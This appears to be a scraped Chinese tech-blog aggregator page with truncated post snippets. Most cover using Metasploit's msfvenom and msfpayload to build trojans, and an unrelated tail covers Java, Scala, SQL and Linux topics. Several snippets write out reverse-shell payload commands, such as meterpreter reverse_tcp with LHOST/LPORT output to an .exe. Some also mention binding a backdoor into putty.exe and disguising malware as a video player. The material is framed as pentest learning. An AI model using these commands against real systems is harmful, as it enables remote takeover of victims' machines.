- Msfvenom详细教程
别动我的cat
网络
简介Msfvenom是一个用来生成后门的软件,Msfvenom是Msfpayload和msfencode的组合,将这两个工具都放在一个Framework实例中,自2015年6月8日起,msfvenom替换了msfpayload和msfencode。参数说明参数简写完整参数说明-l–list列出指定模块的所有可用资源,模块类型包括:payloads,encoders,nops,all等-p–payl
- 利用windows恶意软件获取windows主机shell
栖息的梧桐树
windows
实验目的:模拟黑客利用windows恶意软件获取windows主机shell权限的过程熟悉操作使用的命令实验准备:kali同网段的windows主机(关闭防火墙)msfvenom是一个Metasploit独立的有效负载生成器,也是msfpayload和msfencode的替代品。是用来生成后门的软件。实验内容:制作Windows恶意软件获取shell\msfvenom的shell在windows中
- 远控免杀学习笔记-msfvenom工具介绍(一)
仲瑿
学习安全
msfvenom简介msfvenom是msfpayload和msfencode的结合体,于2015年6⽉8⽇取代了msfpayload和msfencode。在此之后,metasploit-framework下⾯的的msfpayload(荷载⽣成器),msfencoder(编码器),msfcli(监听接⼝)都不再被⽀持常规参数-p,–payload指定需要使用的payload(攻击荷载)。也可以使用
- msfvenom 生成php木马,利用msfvenom生成木马程序
鬼冢喜之郎
msfvenom生成php木马
一,目的:熟悉msfvenom生成木马程序过程,并执行和监听控制.二,工具:MSF三,原理:msfvenom是msfpayload,msfencode的结合体,它的优点是单一,命令行,和效率.利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线四,过程:1,查看帮助命令:root#msfvenom-h结果:2,生成meterpreterpayload并利用shikata_ga_nai
- msf之msfvenom的使用—使用Kali渗透工具生成远控木马
U-C
安全网络
一.先解释一下msfvenom取代了msfpayload和msfencode,常用于生成远控木马,在目标机器上执行后门,在本地机器kali中监听上线。(注意:msfvenom是在shell里使用的哈,不是msfconsole终端!)公式如下(别人的图,借鉴借鉴)二.那就开始使用吧1.使用模块等待生成demo1000.exe(生成shell)(lhost为Kali的IP,Iport在范围内随意设置,
- 网络安全:制作 windows 和 linux 客户端恶意软件进行渗透
White boy&
安全系统安全web安全
实战-制作Windows恶意软件获取公司财务电脑shell实战-WinRAR捆绑恶意程序并自动上线MSF实战-制作Linux恶意软件获取公司服务器shell实战-制作恶意deb软件包来触发后门1.制作Windows恶意软件获取shellmsfvenom是msfpayload,msfencode的结合体,可利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线生成西瓜影音.exe后门程序
- MSF常用的监听模块命令
weixin_34358092
msfpayload命令帮助msfpayload -h列出所有可用的***载荷msfpayload windows/meterpreter/bind_tcp O列出所有windows/meterpreter/bind_tcp下***载荷的配置项(任何***载荷都是可以配置的)msfpayload windows/meterpreter/bind_tcp O.创建一个meterperter的reve
- 熟悉msfvenom生成木马程序过程,并执行和监听控制.
suixinxxx
一,目的:熟悉msfvenom生成木马程序过程,并执行和监听控制.二,工具:MSF三,原理:msfvenom是msfpayload,msfencode的结合体,它的优点是单一,命令行,和效率.利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线四,过程:1,查看帮助命令:root#msfvenom-h结果:2,生成meterpreterpayload并利用shikata_ga_nai
- metasploit msfvenom使用实例
whatday
metasploitframework下的msfpayload(荷载生成器),msfencoder(编码器),msfcli(监听接口)已然成为历史,取而代之的是msfvenom现在metasploitframework主要是msfvenom和msfcosolemsfvenom参数说明当前版本metasploitv4.17.15-dev原版说明:-l,--listListallmodulesfor[
- msfvenom的使用
caiqiiqi
安全
参考:http://www.zerokeeper.com/tools/use-of-msfvenom.htmlhttps://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenomMsfvenom是净荷生成和编码的组合。它将取代msfpayload和msfencode于2015年6月8日。产生一个payload要用msfven
- msfvenom
ChengKaoAO
安全ToolsCTF
摘要在kali2.0的环境上,因为msfpayload没有了,被整合进了msfvenom,所以该博文记录一些关于msfvenom使用技巧。msfvenom:>>>msfvenom是msfpayload,msfencode的结合体,可利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线.目的:熟悉msfvenom生成木马程序过程,并执行和监听控制.原理:msfvenom是msfpayl
- kali msfvenom生成木马
qq_33391644
linuxkali病毒区
在kali2.0的环境上,因为msfpayload没有了,被整合进了msfvenom,所以这就只写一些关于msfvenom的东西。这里就只是记录下生成一个程序的过程。msfvenommsfvenom是msfpayload,msfencode的结合体,可利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线1.首先还是得打开postgresqlroot@kali:~#servicepos
- Metasploit:kali 利用捆绑木马软件渗透Win 7 服务器
Agan '
渗透测试Metasploit学习
当你的才华还撑不起你的野心时那你就应该静下心来学习目录一、生成setup.exe后门程序,即木马程序额外扩展知识点:二、将生成的木马程序与某个软件进行捆绑三、检测目标主机,对目标主机进行渗透测试一、生成setup.exe后门程序,即木马程序操作步骤1、已知本机ip为10.1.1.92,在kali命令终端使用msfpayload生成名为setup的后门程序:msfpayloadwindows/met
- kali之flash挂马
weixin_33727510
root@localhost:~#msfconsolmsf>show#寻求帮助msf>usewindows/shell/bind_tcp#msfpayload(bind_tcp)>setRHOST192.168.48.100RHOST=>192.168.48.100msfpayload(bind_tcp)>generate-tc#windows/shell/bind_tcp-298bytes(st
- vulnhub:DC-1 :drupal 7 (msf、配置文件位置、mysql、drupal数据库加密方式、mysql-update数据、find -exec提权)
违规昵称不予展示
知道版本号drupal7直接用msfpayload一个一个尝试可以获得meterspretershellarp-scan--interface=eth0--localnetflag1:image.png百度drupal配置文件的位置‘sites/default/files’;flag2:image.png这里flag2说不能爆破,而且配置文件给了数据库连接密码使用python开启交互式shell当
- metasploit制作木马程序
叶落秋霜
metasploit自学
第七章第三小节,讲的是将木马绑定到putty.exe程序下。觉得蛮有趣,这里再重复下书上的步骤:1)百度搜索,下载原版putty程序2)在bt5下输入命令:msfpayloadwindows/meterpreter/reverse_tcpLHOST=10.10.10.128LPORT=80R|msfencode-texe-x/root/Desktop/putty.exe-k-oputty_back
- 渗透工具之msf
修炼到救赎
linux
转载自csdn:忆蓉之心简介它是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。环境工具:msf4伪装木马原理:msfvenom是msfpayload,msfencode的结合体,它的优点是单一,命令行,和效率.利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线。构造shellcode常用命令 ms
- 谈谈Metasploit中payload模块
Louisnie
metasploitkali
我们可以不利用漏洞,直接将payload发送给目标主机,诱使其点击,也可获取到目标主机的shell.msf>usepayload/windows/shell_bind_tcp#使用该模块绑定(监听)本机的一个TCP连接端口msfpayload(windows/shell_bind_tcp)>generate#通过generate生成16进值的payload,默认以rube语言编写的#windows
- kali漏洞利用之Meterpreter介绍
the__apollo
网络攻防
使用示例:1.生成Meterpreter后门命令语句如下,如果其中的IP为kali攻击机的IP地址,后面跟着的是参数。msfpayloadwindows/meterpreter/reverse_tcpLHOST=222.28.136.223LPORT=2333R|msfencode-texe-c5>/root/door.exe这个语句中,如果不知道参数是什么,可以在metasploit中查看,查看
- KALI2.0 meterpreter 运用
WDK2017
KALI
初试牛刀1、生产EXE就用meterpreter(shell一个含义)(KALI2.0以前版本为msfpayload)2.0后新命令:msfvenom-pwindows/meterpreter/reverse_tcpLHOST=XXXXLPORT=XXXX-fexe>1234.exe2、默认生成地址是ROOT查看后直接经物理机复制进入目标机WIN20033、打开之前,监听机先打开监听useexlp
- Meterpreter Guide
Zvall
渗透测试
0x01入门篇(生成与接收)功能介绍msfpayload和msfencode已经被时代淘汰了现在都转为msfvenom了msfvenom命令行选项如下:Options:-p,--payloadpayload>指定需要使用的payload(攻击荷载)。如果需要使用自定义的payload,请使用'-'或者stdin指定-l,--list[module_type]列出指定模块的所有可用资源.模块类型包括
- Metasploit进行渗透windows7
Edward-Phoenix
Metasploit笔记
没有测试---先行记录很多朋友对使用Metasploit利用后门程序进行渗透windows7都比较感兴趣,针对这些以下业内相关专家就给大家介绍下,当下黑客怎么利用Metasploit进行渗透windows7的。设定目标主机为:cn_win7_x86_7601虚拟机,地址为:192.168.0.116;而本地主机就为:192.168.0.149。方法步骤一:黑客用Msfpayload直接生成相关的后
- 内网渗透之——msf工具使用
卖N孩的X火柴
渗透测试(内网渗透)
1.msfconsole作用:管理生成exp,管理反弹的shell,通过反弹的shell进行后渗透。。。模块介绍:exploits:攻击脚本payloads:攻击载荷(攻击效果控制)auxiliaru:辅助模块(扫描工具等)post:后渗透模块(提取信息)encoders编码模块nops:无操作生成器2.msfvenom作用:制作木马3.msfencode作用:对木马进行编码4.msf使用:1.打
- 渗透工具之msf
逝之君
读书笔记渗透测试
转载自csdn:忆蓉之心简介它是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。环境工具:msf4伪装木马原理:msfvenom是msfpayload,msfencode的结合体,它的优点是单一,命令行,和效率.利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线。构造shellcode常用命令msf
- msfpayload的用法
weixin_34015860
daniel@daniel-mint~/msf/metasploit-framework$rubymsfpayloadwindows/execCMD=calc.exeCWARNING:NokogiriwasbuiltagainstLibXMLversion2.8.0,buthasdynamicallyloaded2.9.1/**windows/exec-200bytes*http://www.me
- 利用Metasploit进行Linux提权
weixin_30338461
利用Metasploit进行Linux提权Metasploit拥有msfpayload和msfencode这两个工具,这两个工具不但可以生成exe型后门,一可以生成网页脚本类型的webshell,通过生成webshell然后设置监听器,访问webshell的url,幸运的话可以产生一个session,以便进一步利用。下面是具体的利用方法。我们可以通过指令查看msf里的payload然后记住其位置:
- msfvenom
真的是选么
因为比赛需要,自学了一下msfvenom,可能会断断续续或者不完整,仅作参考。在kali2.0的环境上,因为msfpayload没有了,被整合进了msfvenom,所以这就只写一些关于msfvenom的东西。这里就只是记录下生成一个程序的过程。msfvenommsfvenom是msfpayload,msfencode的结合体,可利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线0x
- 黑客制作windows客户端恶意软件进行渗透(kali:metasploit 内网)萌新
kingru
网络安全萌新kalimetasploit
1.客户端渗透原理无法突破对方网络边界的时候,向目标发一个含有后门的程序,或者是一个word文档、pdf文件。想要达到效果同时也要利用好社会工程学,来诱骗受害者执行恶意程序。我们要利用免杀来躲避安全软件的查杀。制作windows恶意软件获取shellMsfvenom是msfpayload,msfencode的结合体,可利用msfvenom生成木马程序,并在主机上执行,在本地监听上线。2.实战-制作
- 使用shellcode打造MSF免杀payload及shellcode加载技术
jackey3Lin
免杀相关
0x00前言经常有同学提及MSFpayload的免杀问题,其实除了Veil之处,还有另一种比较轻巧的方案可以打造免杀的payload,那就是shellcode。0x01从哪里开始shellcode是什么,可以去drops搜索学习,但这并不是本文的重点。因为MSF已经为我们提供了shellcode的生成功能,接下来我们就拿最常用的payload:reverse_tcp来做测试吧!(其它的payloa
- 木马程序的制作
replaceroot
渗透相关木马渗透测试网络安全
0x0:想必大家都听说过计算机病毒或者木马吧,看着电影里面的黑客敲几下键盘就能控制你的系统,窃取你的隐私资料,执行任意命令,很炫酷吧,其实这种技术不难实现,接下来我就带领大家来玩一玩木马的制作.实验环境:Win7SP1+Backtrack5.使用工具有:msfpayload+msfencode.0x01:使用msfpayloadwindows/meterpreter/reverse_tcpLHOS
- scala的option和some
矮蛋蛋
编程scala
原文地址:
http://blog.sina.com.cn/s/blog_68af3f090100qkt8.html
对于学习 Scala 的 Java™ 开发人员来说,对象是一个比较自然、简单的入口点。在 本系列 前几期文章中,我介绍了 Scala 中一些面向对象的编程方法,这些方法实际上与 Java 编程的区别不是很大。我还向您展示了 Scala 如何重新应用传统的面向对象概念,找到其缺点
- NullPointerException
Cb123456
androidBaseAdapter
java.lang.NullPointerException: Attempt to invoke virtual method 'int android.view.View.getImportantForAccessibility()' on a null object reference
出现以上异常.然后就在baidu上
- PHP使用文件和目录
天子之骄
php文件和目录读取和写入php验证文件php锁定文件
PHP使用文件和目录
1.使用include()包含文件
(1):使用include()从一个被包含文档返回一个值
(2):在控制结构中使用include()
include_once()函数需要一个包含文件的路径,此外,第一次调用它的情况和include()一样,如果在脚本执行中再次对同一个文件调用,那么这个文件不会再次包含。
在php.ini文件中设置
- SQL SELECT DISTINCT 语句
何必如此
sql
SELECT DISTINCT 语句用于返回唯一不同的值。
SQL SELECT DISTINCT 语句
在表中,一个列可能会包含多个重复值,有时您也许希望仅仅列出不同(distinct)的值。
DISTINCT 关键词用于返回唯一不同的值。
SQL SELECT DISTINCT 语法
SELECT DISTINCT column_name,column_name
F
- java冒泡排序
3213213333332132
java冒泡排序
package com.algorithm;
/**
* @Description 冒泡
* @author FuJianyong
* 2015-1-22上午09:58:39
*/
public class MaoPao {
public static void main(String[] args) {
int[] mao = {17,50,26,18,9,10
- struts2.18 +json,struts2-json-plugin-2.1.8.1.jar配置及问题!
7454103
DAOspringAjaxjsonqq
struts2.18 出来有段时间了! (貌似是 稳定版)
闲时研究下下! 貌似 sruts2 搭配 json 做 ajax 很吃香!
实践了下下! 不当之处请绕过! 呵呵
网上一大堆 struts2+json 不过大多的json 插件 都是 jsonplugin.34.jar
strut
- struts2 数据标签说明
darkranger
jspbeanstrutsservletScheme
数据标签主要用于提供各种数据访问相关的功能,包括显示一个Action里的属性,以及生成国际化输出等功能
数据标签主要包括:
action :该标签用于在JSP页面中直接调用一个Action,通过指定executeResult参数,还可将该Action的处理结果包含到本页面来。
bean :该标签用于创建一个javabean实例。如果指定了id属性,则可以将创建的javabean实例放入Sta
- 链表.简单的链表节点构建
aijuans
编程技巧
/*编程环境WIN-TC*/ #include "stdio.h" #include "conio.h"
#define NODE(name, key_word, help) \ Node name[1]={{NULL, NULL, NULL, key_word, help}}
typedef struct node { &nbs
- tomcat下jndi的三种配置方式
avords
tomcat
jndi(Java Naming and Directory Interface,Java命名和目录接口)是一组在Java应用中访问命名和目录服务的API。命名服务将名称和对象联系起来,使得我们可以用名称
访问对象。目录服务是一种命名服务,在这种服务里,对象不但有名称,还有属性。
tomcat配置
- 关于敏捷的一些想法
houxinyou
敏捷
从网上看到这样一句话:“敏捷开发的最重要目标就是:满足用户多变的需求,说白了就是最大程度的让客户满意。”
感觉表达的不太清楚。
感觉容易被人误解的地方主要在“用户多变的需求”上。
第一种多变,实际上就是没有从根本上了解了用户的需求。用户的需求实际是稳定的,只是比较多,也比较混乱,用户一般只能了解自己的那一小部分,所以没有用户能清楚的表达出整体需求。而由于各种条件的,用户表达自己那一部分时也有
- 富养还是穷养,决定孩子的一生
bijian1013
教育人生
是什么决定孩子未来物质能否丰盛?为什么说寒门很难出贵子,三代才能出贵族?真的是父母必须有钱,才能大概率保证孩子未来富有吗?-----作者:@李雪爱与自由
事实并非由物质决定,而是由心灵决定。一朋友富有而且修养气质很好,兄弟姐妹也都如此。她的童年时代,物质上大家都很贫乏,但妈妈总是保持生活中的美感,时不时给孩子们带回一些美好小玩意,从来不对孩子传递生活艰辛、金钱来之不易、要懂得珍惜
- oracle 日期时间格式转化
征客丶
oracle
oracle 系统时间有 SYSDATE 与 SYSTIMESTAMP;
SYSDATE:不支持毫秒,取的是系统时间;
SYSTIMESTAMP:支持毫秒,日期,时间是给时区转换的,秒和毫秒是取的系统的。
日期转字符窜:
一、不取毫秒:
TO_CHAR(SYSDATE, 'YYYY-MM-DD HH24:MI:SS')
简要说明,
YYYY 年
MM 月
- 【Scala六】分析Spark源代码总结的Scala语法四
bit1129
scala
1. apply语法
FileShuffleBlockManager中定义的类ShuffleFileGroup,定义:
private class ShuffleFileGroup(val shuffleId: Int, val fileId: Int, val files: Array[File]) {
...
def apply(bucketId
- Erlang中有意思的bug
bookjovi
erlang
代码中常有一些很搞笑的bug,如下面的一行代码被调用两次(Erlang beam)
commit f667e4a47b07b07ed035073b94d699ff5fe0ba9b
Author: Jovi Zhang <
[email protected]>
Date: Fri Dec 2 16:19:22 2011 +0100
erts:
- 移位打印10进制数转16进制-2008-08-18
ljy325
java基础
/**
* Description 移位打印10进制的16进制形式
* Creation Date 15-08-2008 9:00
* @author 卢俊宇
* @version 1.0
*
*/
public class PrintHex {
// 备选字符
static final char di
- 读《研磨设计模式》-代码笔记-组合模式
bylijinnan
java设计模式
声明: 本文只为方便我个人查阅和理解,详细的分析以及源代码请移步 原作者的博客http://chjavach.iteye.com/
import java.util.ArrayList;
import java.util.List;
abstract class Component {
public abstract void printStruct(Str
- 利用cmd命令将.class文件打包成jar
chenyu19891124
cmdjar
cmd命令打jar是如下实现:
在运行里输入cmd,利用cmd命令进入到本地的工作盘符。(如我的是D盘下的文件有此路径 D:\workspace\prpall\WEB-INF\classes)
现在是想把D:\workspace\prpall\WEB-INF\classes路径下所有的文件打包成prpall.jar。然后继续如下操作:
cd D: 回车
cd workspace/prpal
- [原创]JWFD v0.96 工作流系统二次开发包 for Eclipse 简要说明
comsci
eclipse设计模式算法工作swing
JWFD v0.96 工作流系统二次开发包 for Eclipse 简要说明
&nb
- SecureCRT右键粘贴的设置
daizj
secureCRT右键粘贴
一般都习惯鼠标右键自动粘贴的功能,对于SecureCRT6.7.5 ,这个功能也已经是默认配置了。
老版本的SecureCRT其实也有这个功能,只是不是默认设置,很多人不知道罢了。
菜单:
Options->Global Options ...->Terminal
右边有个Mouse的选项块。
Copy on Select
Paste on Right/Middle
- Linux 软链接和硬链接
dongwei_6688
linux
1.Linux链接概念Linux链接分两种,一种被称为硬链接(Hard Link),另一种被称为符号链接(Symbolic Link)。默认情况下,ln命令产生硬链接。
【硬连接】硬连接指通过索引节点来进行连接。在Linux的文件系统中,保存在磁盘分区中的文件不管是什么类型都给它分配一个编号,称为索引节点号(Inode Index)。在Linux中,多个文件名指向同一索引节点是存在的。一般这种连
- DIV底部自适应
dcj3sjt126com
JavaScript
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml&q
- Centos6.5使用yum安装mysql——快速上手必备
dcj3sjt126com
mysql
第1步、yum安装mysql
[root@stonex ~]# yum -y install mysql-server
安装结果:
Installed:
mysql-server.x86_64 0:5.1.73-3.el6_5 &nb
- 如何调试JDK源码
frank1234
jdk
相信各位小伙伴们跟我一样,想通过JDK源码来学习Java,比如collections包,java.util.concurrent包。
可惜的是sun提供的jdk并不能查看运行中的局部变量,需要重新编译一下rt.jar。
下面是编译jdk的具体步骤:
1.把C:\java\jdk1.6.0_26\sr
- Maximal Rectangle
hcx2013
max
Given a 2D binary matrix filled with 0's and 1's, find the largest rectangle containing all ones and return its area.
public class Solution {
public int maximalRectangle(char[][] matrix)
- Spring MVC测试框架详解——服务端测试
jinnianshilongnian
spring mvc test
随着RESTful Web Service的流行,测试对外的Service是否满足期望也变的必要的。从Spring 3.2开始Spring了Spring Web测试框架,如果版本低于3.2,请使用spring-test-mvc项目(合并到spring3.2中了)。
Spring MVC测试框架提供了对服务器端和客户端(基于RestTemplate的客户端)提供了支持。
&nbs
- Linux64位操作系统(CentOS6.6)上如何编译hadoop2.4.0
liyong0802
hadoop
一、准备编译软件
1.在官网下载jdk1.7、maven3.2.1、ant1.9.4,解压设置好环境变量就可以用。
环境变量设置如下:
(1)执行vim /etc/profile
(2)在文件尾部加入:
export JAVA_HOME=/home/spark/jdk1.7
export MAVEN_HOME=/ho
- StatusBar 字体白色
pangyulei
status
[[UIApplication sharedApplication] setStatusBarStyle:UIStatusBarStyleLightContent];
/*you'll also need to set UIViewControllerBasedStatusBarAppearance to NO in the plist file if you use this method
- 如何分析Java虚拟机死锁
sesame
javathreadoracle虚拟机jdbc
英文资料:
Thread Dump and Concurrency Locks
Thread dumps are very useful for diagnosing synchronization related problems such as deadlocks on object monitors. Ctrl-\ on Solaris/Linux or Ctrl-B
- 位运算简介及实用技巧(一):基础篇
tw_wangzhengquan
位运算
http://www.matrix67.com/blog/archives/263
去年年底写的关于位运算的日志是这个Blog里少数大受欢迎的文章之一,很多人都希望我能不断完善那篇文章。后来我看到了不少其它的资料,学习到了更多关于位运算的知识,有了重新整理位运算技巧的想法。从今天起我就开始写这一系列位运算讲解文章,与其说是原来那篇文章的follow-up,不如说是一个r
- jsearch的索引文件结构
yangshangchuan
搜索引擎jsearch全文检索信息检索word分词
jsearch是一个高性能的全文检索工具包,基于倒排索引,基于java8,类似于lucene,但更轻量级。
jsearch的索引文件结构定义如下:
1、一个词的索引由=分割的三部分组成: 第一部分是词 第二部分是这个词在多少